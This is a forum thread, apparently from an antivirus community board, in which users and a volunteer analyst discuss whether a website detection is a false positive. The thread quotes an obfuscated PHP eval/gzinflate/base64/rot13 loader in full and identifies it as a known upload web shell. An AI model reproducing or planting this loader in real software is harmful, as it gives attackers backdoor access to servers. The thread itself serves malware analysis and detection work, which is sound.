Need to check if a URL has a false positive

Can anybody check the following in order to check for a false positive?

URL: http://www.psa.com.ar/usuarios/novedades
Infection: PHP:BackDoor-CB [Trj]
Process: C:\Program Files\Google\Chrome\Application\chrome.exe

Regards,
Gustavo Oga
Buenos Aires
Argentina

HTML scan
https://www.virustotal.com/nb/file/75d0705a50b16cc3a15e77d3e4302291bb8026fba5b0dc9af055499938dc19f3/analysis/1441405950/

Only Avast detects.

https://sitecheck.sucuri.net/results/www.psa.com.ar/usuarios/novedades

Sucuri blog / PHP backdoors https://blog.sucuri.net/2014/02/php-backdoors-hidden-with-clever-use-of-extract-function.html

I will see if I can get it confirmed from other labs …

Do a Quttera scan and you will see the PHP malware.
-/usuarios/novedades
Severity: Malicious
Reason: Detected malicious PHP content
Details: Detected malicious PHP content
Offset: 15914

[[eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9^^/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ^^DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5^^sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8="))));]]

Reported to Avast, so no FP.
Vuln.: -http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.psa.com.ar → -: //s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875 etc.
uMatrix has prevented the following page from loading:
-http://s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5303bb29505f7875

polonus

When trying to access the home page, I received another notification from Avast; a moment later it did not show any more.

hxxp: //www.psa.com.ar/ JS:includer-BIW [Trj]

See the screenshot attached.

Hi jefferson sant,

That is what Avast detects there, and only 2 AVs detect this. The detection has been found to be FP-prone, so we have to establish that we see real malicious code here.
I found traces also of adblock circumventing code, so there might be a reason for it to be flagged.
Another example of a similar detection was seen here: https://api.vtapi.net/hu/file/6d2f3a59492223018e34c219832936457634a0220bab861d29bc3ffb55aeacf1/analysis/

The PHP malcode Quttera came up with is being discussed here: https://www.byte.nl/blog/analysis-of-http-posted-php-malware
Where Avast also blocks: http://ddecode.com/phpdecoder/?results=Backdoor -CB[Trj] for the deobfuscation. *
At various analysis sites I get the same Avast result. * PHP Syntax Check: Parse error: syntax error, unexpected ‘;’, expecting ‘]’ in your code on line 1

polonus (volunteer website security analyst and website error-hunter)


novedades.htm
https://www.virustotal.com/nb/file/eec5e6e5cee497b13c467684ad36217fbc294860fe0fa39a44179901bb550dc2/analysis/1441477265/

Message from F-Secure lab

The file you submitted is clean. It is not malicious. No detection needed.

I am still stuck with this report, code won’t go away.
Re; http://quttera.com/detailed_report/www.psa.com.ar
I get Redirections:
HTTP Status Code: 500 Server Unavailable
Content Size: 0 bytes
Content Type: no/content
IP Address: 200.16.135.151
Country: Argentina
Web Server:
Netcraft does not like that IP: http://toolbar.netcraft.com/site_report?url=http://200.16.135.151
a meagre 4/100 green…

polonus

I am still stuck with this report, code won't go away. Re; http://quttera.com/detailed_report/www.psa.com.ar
Quttera code scan https://www.virustotal.com/nb/file/b9fbbb67a433390579f9900fb4cf6171696ccc1b2f7b2710bc6483a52ec0b39e/analysis/1441488052/

Hi Pondus,

But here is the same PHP shell code, which is flagged the same by Avast: -https://www.google.pl/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&cad=rja&uact=8&ved=0CEkQFjAFahUKEwiek8a-_uDHAhXGWhQKHRSfAJM&url=http%3A%2F%2Fwww.pakteenleets.net%2F2014%2F10%2Fsmall-upload-shell-php.html&usg=AFQjCNGPqwdFdrSRs-T3i7zxmpyU0rR9hg
Exactly what Quttera gives under view code!

Or the gzinflate recursively coded PHP shell must be benign - a FP on the compressed rot13 code?

pol

And that one is detected:
https://www.virustotal.com/nb/file/e05fc0d660252ed3b76fdba22db0c723677f7c11da54c77297a4280091286752/analysis/1441570049/

There is a slight difference at the beginning and end of the code:

sample 1 = starts with [[eval and ends with "))));]]
sample 2 = starts with <?php eval and ends with ")))); ?>

EDIT: after looking closer, there are also some minor code changes in the middle of the code.
If the code was exactly identical, should the MD5 not be the same?

Message from BlueCoat lab …

The one sample that was detected got an auto-added signature when I uploaded it.

========================================================================================
For your kind information, the undetected sample has the same characteristics and behavior as the detected script. Therefore, detections have been added for both samples.